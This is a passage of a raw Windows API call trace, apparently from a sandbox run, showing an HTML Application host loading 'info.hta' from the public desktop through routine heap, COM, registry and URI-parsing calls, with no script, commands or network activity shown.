[1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14dfec | out: ppvObject=0x14dfec*=0x74478c7c) returned 0x0 [0223.193] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.193] IInternetProtocolInfo:ParseUrl (in: This=0x74478c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x533418, cchResult=0xc, pcchResult=0x14e044, dwReserved=0x0 | out: pwzResult="", pcchResult=0x14e044*=0x0) returned 0x800c0011 [0223.193] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.193] IUnknown:Release (This=0x74478c7c) returned 0x1 [0223.193] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.193] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.193] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0223.194] IUnknown:Release (This=0x53bdec) returned 0x2 [0223.194] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x2c) returned 0x52d690 [0223.194] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x53b678 [0223.194] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x5c) returned 0x5444f0 [0223.194] GetDC (hWnd=0x0) returned 0xffffffffab0101eb [0223.194] GetDeviceCaps (hdc=0xab0101eb, index=88) returned 96 [0223.194] ReleaseDC (hWnd=0x0, hDC=0xab0101eb) returned 1 [0223.194] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000 [0223.195] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14e880 | out: phkResult=0x14e880*=0x1bc) returned 0x0 [0223.195] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14e884 | out: phkResult=0x14e884*=0x1c4) returned 0x0 [0223.195] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x14e840 | out: phkResult=0x14e840*=0x0) returned 0x2 [0223.195] RegOpenKeyExW (in: hKey=0x1bc, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x14e840 | out: phkResult=0x14e840*=0x0) returned 0x2 [0223.195] RegCloseKey (hKey=0x0) returned 0x6 [0223.195] RegCloseKey (hKey=0x0) returned 0x6 [0223.195] RegCloseKey (hKey=0x1bc) returned 0x0 [0223.195] RegCloseKey (hKey=0x1c4) returned 0x0 [0223.195] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x53b6a8 [0223.195] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x44) returned 0x5294f0 [0223.195] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x5c) returned 0x54b3f0 [0223.195] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76180000 [0223.195] GetProcAddress (hModule=0x76180000, lpProcName="InitializeSRWLock") returned 0x76f48456 [0223.196] GetProcAddress (hModule=0x76180000, lpProcName="AcquireSRWLockExclusive") returned 0x76f429f1 [0223.196] GetProcAddress (hModule=0x76180000, lpProcName="AcquireSRWLockShared") returned 0x76f42560 [0223.196] GetProcAddress (hModule=0x76180000, lpProcName="ReleaseSRWLockExclusive") returned 0x76f429ab [0223.196] GetProcAddress (hModule=0x76180000, lpProcName="ReleaseSRWLockShared") returned 0x76f425a9 [0223.196] RtlInitializeConditionVariable () returned 0x54b424 [0223.196] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x34) returned 0x544558 [0223.196] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x34) returned 0x54b458 [0223.196] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x533418 [0223.196] IUnknown:Release (This=0x74478cb0) returned 0x1 [0223.197] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x52d040 [0223.282] IUnknown_QueryService (in: punk=0x744796a4, guidService=0x7410880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7410880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x541fd0 | out: ppvOut=0x541fd0*=0x0) returned 0x80004005 [0223.282] IUnknown:QueryInterface (in: This=0x744796a4, riid=0x766142d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x14f5c8 | out: ppvObject=0x14f5c8*=0x744796b8) returned 0x0 [0223.282] IServiceProvider:QueryService (in: This=0x744796b8, guidService=0x7410880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7410880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x541fd0 | out: ppvObject=0x541fd0*=0x0) returned 0x80004005 [0223.282] IUnknown:Release (This=0x744796b8) returned 0x1 [0223.282] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x34) returned 0x54b498 [0223.282] IInternetSecurityManager:SetSecuritySite (This=0x543ed0, pSite=0x5426b4) returned 0x0 [0223.282] IUnknown:Release (This=0x5426b4) returned 0x0 [0223.282] IUnknown:AddRef (This=0x5426b4) returned 0x28 [0223.282] IUnknown:QueryInterface (in: This=0x5426b4, riid=0x753261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x14f600 | out: ppvObject=0x14f600*=0x5426b8) returned 0x0 [0223.283] IServiceProvider:QueryService (in: This=0x5426b8, guidService=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x543ef8 | out: ppvObject=0x543ef8*=0x0) returned 0x80004002 [0223.283] IServiceProvider:QueryService (in: This=0x5426b8, guidService=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x543ef4 | out: ppvObject=0x543ef4*=0x0) returned 0x80004002 [0223.283] IServiceProvider:QueryService (in: This=0x5426b8, guidService=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x543ef0 | out: ppvObject=0x543ef0*=0x744796bc) returned 0x0 [0223.283] IUnknown:Release (This=0x5426b8) returned 0x0 [0223.283] CoTaskMemAlloc (cb=0x6d) returned 0x54b4d8 [0223.283] CoTaskMemAlloc (cb=0x9) returned 0x53b6c0 [0223.283] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc) returned 0x54b568 [0223.283] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x54b950 [0223.315] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0 [0223.315] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x44) returned 0x529540 [0223.317] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc) returned 0x54b580 [0223.317] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x54b598 [0223.346] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4) returned 0x53ba58 [0223.346] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x541938 [0223.346] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x10) returned 0x54b5b0 [0223.346] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x94) returned 0x54b9a8 [0223.346] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x34) returned 0x54ba48 [0223.346] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x70) returned 0x54ba88 [0223.347] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xf8) returned 0x54bb00 [0223.347] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8b4) returned 0x54bc00 [0223.347] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x54b5c8 [0223.347] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.347] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x54b5e0 [0223.347] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x84) returned 0x54c4c0 [0223.467] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x800) returned 0x54c550 [0223.467] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x800) returned 0x54cd58 [0223.467] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x4c) returned 0x54d560 [0223.467] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x800) returned 0x54d5b8 [0223.467] IsCharSpaceW (wch=0x48) returned 0 [0223.467] IsCharAlphaNumericW (ch=0x5c) returned 0 [0223.467] IsCharSpaceW (wch=0x5c) returned 0 [0223.467] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x533438 [0223.467] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x54ddd8 [0223.467] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x533458 [0223.467] IsCharSpaceW (wch=0x41) returned 0 [0223.467] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc) returned 0x54b5f8 [0223.468] IsCharAlphaNumericW (ch=0x20) returned 0 [0223.468] IsCharSpaceW (wch=0x20) returned 1 [0223.468] IsCharSpaceW (wch=0x7b) returned 0 [0223.468] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x541960 [0223.468] IsCharSpaceW (wch=0x20) returned 1 [0223.468] IsCharAlphaNumericW (ch=0x7b) returned 0 [0223.468] IsCharSpaceW (wch=0x62) returned 0 [0223.468] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54ddd8 | out: hHeap=0x510000) returned 1 [0223.468] IsCharAlphaNumericW (ch=0x3a) returned 0 [0223.468] IsCharSpaceW (wch=0x3a) returned 0 [0223.468] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x541988 [0223.543] IsCharAlphaNumericW (ch=0x3a) returned 0 [0223.543] IsCharSpaceW (wch=0x75) returned 0 [0223.543] IsCharAlphaNumericW (ch=0x28) returned 0 [0223.543] IsCharSpaceW (wch=0x28) returned 0 [0223.543] IsCharAlphaNumericW (ch=0x28) returned 0 [0223.543] IsCharSpaceW (wch=0x23) returned 0 [0223.543] IsCharSpaceW (wch=0x23) returned 0 [0223.543] IsCharSpaceW (wch=0x7d) returned 0 [0223.543] IsCharAlphaNumericW (ch=0x7d) returned 0 [0223.543] IsCharSpaceW (wch=0x29) returned 0 [0223.543] IsCharSpaceW (wch=0x75) returned 0 [0223.543] IsCharSpaceW (wch=0x75) returned 0 [0223.543] IsCharSpaceW (wch=0x29) returned 0 [0223.543] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x533498 [0223.543] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x34) returned 0x54efc8 [0223.543] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x524090 [0223.543] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x54b610 [0223.543] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x54b628 [0223.543] CoTaskMemFree (pv=0x54b4d8) [0223.543] CoTaskMemFree (pv=0x53b6c0) [0223.543] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x14) returned 0x5334b8 [0223.544] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76340000 [0223.545] GetProcAddress (hModule=0x76340000, lpProcName=0x6) returned 0x76343e59 [0223.545] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0223.545] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x340) returned 0x54f008 [0223.545] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x4a) returned 0x54ddd8 [0223.546] IsOS (dwOS=0x25) returned 1 [0223.546] GetSysColor (nIndex=26) returned 0xcc6600 [0223.546] IsOS (dwOS=0x25) returned 1 [0223.546] GetSysColor (nIndex=5) returned 0xffffff [0223.546] GetSysColor (nIndex=8) returned 0x0 [0223.546] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.546] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x53b6c0 [0223.602] wcstol (in: _String="0,0,255", _EndPtr=0x14e25c, _Radix=10 | out: _EndPtr=0x14e25c*=",0,255") returned 0 [0223.602] wcstol (in: _String="0,255", _EndPtr=0x14e25c, _Radix=10 | out: _EndPtr=0x14e25c*=",255") returned 0 [0223.602] wcstol (in: _String="255", _EndPtr=0x14e25c, _Radix=10 | out: _EndPtr=0x14e25c*="") returned 255 [0223.602] wcstol (in: _String="128,0,128", _EndPtr=0x14e25c, _Radix=10 | out: _EndPtr=0x14e25c*=",0,128") returned 128 [0223.602] wcstol (in: _String="0,128", _EndPtr=0x14e25c, _Radix=10 | out: _EndPtr=0x14e25c*=",128") returned 0 [0223.602] wcstol (in: _String="128", _EndPtr=0x14e25c, _Radix=10 | out: _EndPtr=0x14e25c*="") returned 128 [0223.604] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0 [0223.604] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0 [0223.604] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f314 | out: phkResult=0x14f314*=0x1a4) returned 0x0 [0223.604] SHGetValueW (in: hkey=0x1a4, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x14f318, pcbData=0x14f310*=0xa | out: pdwType=0x0, pvData=0x14f318, pcbData=0x14f310*=0xa) returned 0x2 [0223.604] RegCloseKey (hKey=0x1a4) returned 0x0 [0223.604] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x80) returned 0x550350 [0223.604] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x53b660 [0223.604] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x3a) returned 0x524120 [0223.605] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x6a) returned 0x5503d8 [0223.620] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x53b690 [0223.620] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x26) returned 0x52d070 [0223.620] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x6e) returned 0x550450 [0223.621] GetProcessHeap () returned 0x510000 [0223.621] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54b4d8 | out: hHeap=0x510000) returned 1 [0223.621] GetProcessHeap () returned 0x510000 [0223.621] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54f368 | out: hHeap=0x510000) returned 1 [0223.621] GetProcessHeap () returned 0x510000 [0223.621] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x53ba68 | out: hHeap=0x510000) returned 1 [0223.621] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x5334d8 [0223.621] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x54b658 [0223.621] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x5334f8 [0223.621] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x524168 [0223.624] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x60) returned 0x54b4d8 [0223.625] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x24) returned 0x52d0a0 [0223.625] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x5419d8 [0223.625] GetAcceptLanguagesW () returned 0x0 [0223.625] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x53b330 [0223.625] GetClassNameW (in: hWnd=0x20158, lpClassName=0x14f5e4, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0223.625] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0223.625] GetParent (hWnd=0x20158) returned 0x6014e [0223.625] GetClassNameW (in: hWnd=0x6014e, lpClassName=0x14f5e4, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0223.625] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0223.625] GetParent (hWnd=0x6014e) returned 0x0 [0223.625] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x14) returned 0x533518 [0223.625] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x52d0d0 [0223.625] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x533518 | out: hHeap=0x510000) returned 1 [0223.678] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x54de30 [0223.678] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xe) returned 0x54b6d0 [0223.678] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x94) returned 0x5504c8 [0223.678] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x14) returned 0x533518 [0223.678] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x12) returned 0x533538 [0223.678] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x14) returned 0x533558 [0223.678] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xe) returned 0x54b6e8 [0223.678] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x10) returned 0x54b700 [0223.678] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xe) returned 0x54b718 [0223.678] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x10) returned 0x54b730 [0223.678] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x541a00 [0223.678] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1a) returned 0x541a28 [0223.678] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1a) returned 0x541a50 [0223.678] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x12) returned 0x533578 [0223.679] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x12) returned 0x533598 [0223.679] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x12) returned 0x5335b8 [0223.679] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x12) returned 0x5335d8 [0223.679] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x10) returned 0x54b748 [0223.681] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc) returned 0x54b778 [0223.681] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x10) returned 0x54b790 [0223.681] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x12) returned 0x5335f8 [0223.681] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xe) returned 0x54b7a8 [0223.682] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xa) returned 0x54b7c0 [0223.682] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x26) returned 0x52d100 [0223.682] GetProcessHeap () returned 0x510000 [0223.682] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x541a78 | out: hHeap=0x510000) returned 1 [0223.682] GetProcessHeap () returned 0x510000 [0223.682] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x541aa0 | out: hHeap=0x510000) returned 1 [0223.682] GetProcessHeap () returned 0x510000 [0223.682] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x541ac8 | out: hHeap=0x510000) returned 1 [0223.682] GetProcessHeap () returned 0x510000 [0223.682] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x53b570 | out: hHeap=0x510000) returned 1 [0223.682] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54b748 | out: hHeap=0x510000) returned 1 [0223.682] IMoniker:GetDisplayName (in: This=0x5205b0, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x14f5a8 | out: ppszDisplayName=0x14f5a8*="file:///C:/users/public/desktop/info.hta") returned 0x0 [0223.682] IUnknown:QueryInterface (in: This=0x5205b0, riid=0x740772f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x14f580 | out: ppvObject=0x14f580*=0x5205bc) returned 0x0 [0223.682] IUriContainer:GetIUri (in: This=0x5205bc, ppIUri=0x14f5b0 | out: ppIUri=0x14f5b0*=0x53c14c) returned 0x0 [0223.682] IUnknown:Release (This=0x5205bc) returned 0x1 [0223.682] IUnknown:AddRef (This=0x5205b0) returned 0x2 [0223.682] IUnknown:AddRef (This=0x53c14c) returned 0x5 [0223.682] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.682] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.682] IMoniker:GetDisplayName (in: This=0x5205b0, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x14f488 | out: ppszDisplayName=0x14f488*="file:///C:/users/public/desktop/info.hta") returned 0x0 [0223.682] UrlGetLocationW (psz1="file:///C:/users/public/desktop/info.hta") returned 0x0 [0223.683] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="file:///C:/users/public/desktop/info.hta", ppmk=0x14f454*=0x0, dwFlags=0x1 | out: ppmk=0x14f454*=0x54f368) returned 0x0 [0223.683] CreateUri (in: pwzURI="file:///C:/users/public/desktop/info.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x14f44c | out: ppURI=0x14f44c*=0x53c4ac) returned 0x0 [0223.683] IUri:GetScheme (in: This=0x53c4ac, pdwScheme=0x14f3e4 | out: pdwScheme=0x14f3e4*=0x9) returned 0x0 [0223.683] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1 [0223.683] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.683] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1c) returned 0x541ac8 [0223.683] IUnknown:AddRef (This=0x53c4ac) returned 0x5 [0223.683] IUri:GetAbsoluteUri (in: This=0x53c4ac, pbstrAbsoluteUri=0x541ac8 | out: pbstrAbsoluteUri=0x541ac8*="file:///C:/users/public/desktop/info.hta") returned 0x0 [0223.683] IUnknown:Release (This=0x53c4ac) returned 0x4 [0223.683] IUnknown:AddRef (This=0x54f368) returned 0x2 [0223.683] IUnknown:Release (This=0x54f368) returned 0x1 [0223.683] IUnknown:AddRef (This=0x5205b0) returned 0x3 [0223.683] IUnknown:Release (This=0x54f368) returned 0x0 [0223.684] IUnknown:AddRef (This=0x5205b0) returned 0x4 [0223.684] IUnknown:QueryInterface (in: This=0x53c14c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14f254 | out: ppvObject=0x14f254*=0x53c14c) returned 0x0 [0223.684] IUnknown:Release (This=0x53c14c) returned 0x5 [0223.684] IUnknown:AddRef (This=0x53c14c) returned 0x6 [0223.684] IUnknown:QueryInterface (in: This=0x5205b0, riid=0x740772f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x14f228 | out: ppvObject=0x14f228*=0x5205bc) returned 0x0 [0223.684] IUriContainer:GetIUri (in: This=0x5205bc, ppIUri=0x14f27c | out: ppIUri=0x14f27c*=0x53c14c) returned 0x0 [0223.684] IUnknown:Release (This=0x5205bc) returned 0x4 [0223.684] IUnknown:AddRef (This=0x5205b0) returned 0x5 [0223.684] IUnknown:Release (This=0x5205b0) returned 0x4 [0223.684] IUnknown:AddRef (This=0x53c14c) returned 0x8 [0223.684] IUnknown:QueryInterface (in: This=0x53c14c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14f254 | out: ppvObject=0x14f254*=0x53c14c) returned 0x0 [0223.684] IUnknown:Release (This=0x53c14c) returned 0x8 [0223.684] IUnknown:AddRef (This=0x53c14c) returned 0x9 [0223.684] IUri:GetScheme (in: This=0x53c14c, pdwScheme=0x14f24c | out: pdwScheme=0x14f24c*=0x9) returned 0x0 [0223.684] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xc8) returned 0x5507b0 [0223.684] GetCurrentProcessId () returned 0x774 [0223.684] IUnknown:QueryInterface (in: This=0x53c14c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14f254 | out: ppvObject=0x14f254*=0x53c14c) returned 0x0 [0223.684] IUnknown:Release (This=0x53c14c) returned 0x9 [0223.684] IUnknown:AddRef (This=0x53c14c) returned 0xa [0223.684] IUri:GetScheme (in: This=0x53c14c, pdwScheme=0x14f224 | out: pdwScheme=0x14f224*=0x9) returned 0x0 [0223.684] IUnknown:QueryInterface (in: This=0x53c14c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14f1d8 | out: ppvObject=0x14f1d8*=0x53c14c) returned 0x0 [0223.684] IUnknown:Release (This=0x53c14c) returned 0xa [0223.684] IUnknown:AddRef (This=0x53c14c) returned 0xb [0223.685] IUnknown:Release (This=0x53c14c) returned 0xa [0223.685] IUri:GetAbsoluteUri (in: This=0x53c14c, pbstrAbsoluteUri=0x14f254 | out: pbstrAbsoluteUri=0x14f254*="file:///C:/users/public/desktop/info.hta") returned 0x0 [0223.685] GetProcAddress (hModule=0x76340000, lpProcName=0x7) returned 